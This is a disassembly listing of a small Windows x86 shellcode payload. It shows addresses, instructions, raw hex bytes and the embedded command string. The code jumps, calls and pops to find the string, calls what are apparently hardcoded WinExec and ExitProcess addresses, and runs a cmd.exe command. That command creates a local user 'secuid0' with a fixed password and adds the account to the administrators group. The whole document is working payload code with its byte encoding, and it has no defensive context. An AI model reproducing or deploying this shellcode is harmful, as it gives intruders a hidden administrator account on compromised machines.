0x0        jmp 0x18                            \xeb\x16                  ..        

     label_0x2:
0x2        pop ebx                             \x5b                      [         
0x3        xor eax, eax                        \x31\xc0                  1.        
0x5        push eax                            \x50                      P         
0x6        push ebx                            \x53                      S         
0x7        mov ebx, 0x7c8623ad                 \xbb\xad\x23\x86\x7c      ..#.|     
0xc        call ebx                            \xff\xd3                  ..        
0xe        xor eax, eax                        \x31\xc0                  1.        
0x10       push eax                            \x50                      P         
0x11       mov ebx, 0x7c81cafa                 \xbb\xfa\xca\x81\x7c      ....|     
0x16       call ebx                            \xff\xd3                  ..        
     label_0x18:
0x18       call 2                              \xe8\xe5\xff\xff\xff      .....     
0x1d       cmd.exe /c net user secuid0 m0nk /add && net localgroup administrators secuid0 /add ; string\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x73\x65\x63\x75\x69\x64\x30\x20\x6d\x30\x6e\x6b\x20\x2f\x61\x64\x64\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20\x73\x65\x63\x75\x69\x64\x30\x20\x2f\x61\x64\x64          
0x70       db 0x00 (!)                        \x00                      .         
